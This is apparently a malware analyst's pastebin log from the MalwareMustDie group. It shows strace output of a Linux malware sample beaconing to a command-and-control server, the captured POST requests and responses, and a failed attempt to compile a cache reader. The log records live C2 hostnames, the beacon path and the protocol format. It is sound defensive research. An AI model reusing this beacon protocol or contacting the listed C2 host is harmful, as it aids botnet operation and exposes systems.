- [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"..., 832) = 832
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=22928, ...}) = 0
- [pid 18153] mmap(NULL, 2117888, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d48c7000
- [pid 18153] mprotect(0x7f57d48cc000, 2093056, PROT_NONE) = 0
- [pid 18153] mmap(0x7f57d4acb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x4000) = 0x7f57d4acb000
- [pid 18153] close(4) = 0
- [pid 18153] mprotect(0x7f57d4acb000, 4096, PROT_READ) = 0
- [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
- [pid 18153] stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
- [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
- [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
- [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
- [pid 18153] read(4, "", 4096) = 0
- [pid 18153] close(4) = 0
- [pid 18153] munmap(0x7f57db0be000, 4096) = 0
- [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
- [pid 18153] socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
- [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
- [pid 18153] poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
- [pid 18153] sendto(4, "\313:\1\0\0\1\0\0\0\0\0\0\17lovecupidonline\4inf"..., 38, MSG_NOSIGNAL, NULL, 0) = 38
- [pid 18153] poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
- [pid 18153] ioctl(4, FIONREAD, [54]) = 0
- [pid 18153] recvfrom(4, "\313:\201\200\0\1\0\1\0\0\0\0\17lovecupidonline\4inf"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 54
- [pid 18153] close(4) = 0
- [pid 18153] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
- [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("176.119.3.242")}, 16) = 0
- [pid 18153] write(4, "POST /cupids_banner/cupids.php H"..., 196) = 196
- // CALLBACKS GENERATED:
- // CNC calls -1-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 91
- R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:30:05 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 13
- Connection: close
- Content-Type: text/html; charset=UTF-8
- mysql_connect^Y<96><E0>S<E5><EC>^@^@B^@^@^@B^@^@^@^@^Y<DB><F2><BE>)^@&<88>v%<8C>^H^@E<CC>^@4m^Q@^@9^F<AC>
- <B0>w^C<F2>N.%E^@P<8A><B8><86>9<DE>^Y<D0>P<EA><BE><80>^Q^@zF<81>^@^@^A^A^H[...]
- // CNC Calls -2-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 91
- R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
- //response
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:31:05 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
- // CNC Calls -3-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 12
- P,0,0,0,0,2
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:32:06 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 2
- Connection: close
- Content-Type: text/html; charset=UTF-8
- C
- // CNC calls -4-
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- Content-Length: 12
- P,0,0,0,0,3
- // response:
- HTTP/1.1 200 OK
- Date: Tue, 05 Aug 2014 08:24:55 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.5.15
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
- // compile the reader for cache reading..
- // source1: https://github.com/freeoks/SD0_reader
- // source2: http://ultra-embedded.com/fat_filelib
- // put all in a place:
- -rw-r--r-- 1 rik rik 4980 Nov 30 2013 fat_access.h
- -rw-r--r-- 1 rik rik 526 Nov 30 2013 fat_cache.h
- -rw-r--r-- 1 rik rik 4983 Nov 30 2013 fat_defs.h
- -rw-r--r-- 1 rik rik 4698 Nov 30 2013 fat_filelib.h
- -rw-r--r-- 1 rik rik 545 Nov 30 2013 fat_format.h
- -rw-r--r-- 1 rik rik 4646 Nov 30 2013 fat_list.h
- -rw-r--r-- 1 rik rik 3330 Nov 30 2013 fat_misc.h
- -rw-r--r-- 1 rik rik 2409 Nov 30 2013 fat_opts.h
- -rw-r--r-- 1 rik rik 783 Nov 30 2013 fat_string.h
- -rw-r--r-- 1 rik rik 922 Nov 30 2013 fat_table.h
- -rw-r--r-- 1 rik rik 1998 Nov 30 2013 fat_types.h
- -rw-r--r-- 1 rik rik 599 Nov 30 2013 fat_write.h
- // edit the makefile..get rid of "/lib/"
- // and compile..
- $ make
- gcc -c -I./lib read_sd0.c -o read_sd0.o
- read_sd0.c: In function 'decrypt_blocks':
- read_sd0.c:51:9: warning: incompatible implicit declaration of built-in function 'memcpy' [enabled by default]
- read_sd0.c: In function 'read_files_from_directory':
- read_sd0.c:130:47: warning: incompatible implicit declaration of built-in function 'strlen' [enabled by default]
- read_sd0.c:131:17: warning: incompatible implicit declaration of built-in function 'strcpy' [enabled by default]
- read_sd0.c:132:17: warning: incompatible implicit declaration of built-in function 'strcat' [enabled by default]
- gcc -c -I./lib fat_access.c -o fat_access.o
- gcc -c -I./lib fat_cache.c -o fat_cache.o
- gcc -c -I./lib fat_filelib.c -o fat_filelib.o
- gcc -c -I./lib fat_format.c -o fat_format.o
- gcc -c -I./lib fat_misc.c -o fat_misc.o
- gcc -c -I./lib fat_string.c -o fat_string.o
- gcc -c -I./lib fat_table.c -o fat_table.o
- gcc -c -I./lib fat_write.c -o fat_write.o
- gcc -s read_sd0.o fat_access.o fat_cache.o fat_filelib.o fat_format.o fat_misc.o fat_string.o fat_table.o fat_write.o -o read_sd0
- // doesnt work :-(((( no output at all..
- ./read_sd0 -f .cache -d ./test
- execve("./read_sd0", ["./read_sd0", "-f", ".cache", "-d", "./test"], [/* 20 vars */]) = 0
- brk(0) = 0x1479000
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf716000
- access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- open("/etc/ld.so.cache", O_RDONLY) = 3
- fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fdfcf708000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fdfcf16e000
- mprotect(0x7fdfcf2f0000, 2093056, PROT_NONE) = 0
- mmap(0x7fdfcf4ef000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7fdfcf4ef000
- mmap(0x7fdfcf4f4000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf4f4000
- close(3) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf707000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf706000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf705000
- arch_prctl(ARCH_SET_FS, 0x7fdfcf706700) = 0
- mprotect(0x7fdfcf4ef000, 16384, PROT_READ) = 0
- mprotect(0x7fdfcf718000, 4096, PROT_READ) = 0
- munmap(0x7fdfcf708000, 56122) = 0
- open(".cache", O_RDONLY) = 3
- lseek(3, 0, SEEK_END) = 12582912
- mmap(NULL, 12582912, PROT_READ, MAP_SHARED, 3, 0) = 0x7fdfce56e000
- exit_group(0) = ?
- ----
- #MalwareMustdie | @unixfreaxjp
Add Comment
Please, Sign In to add comment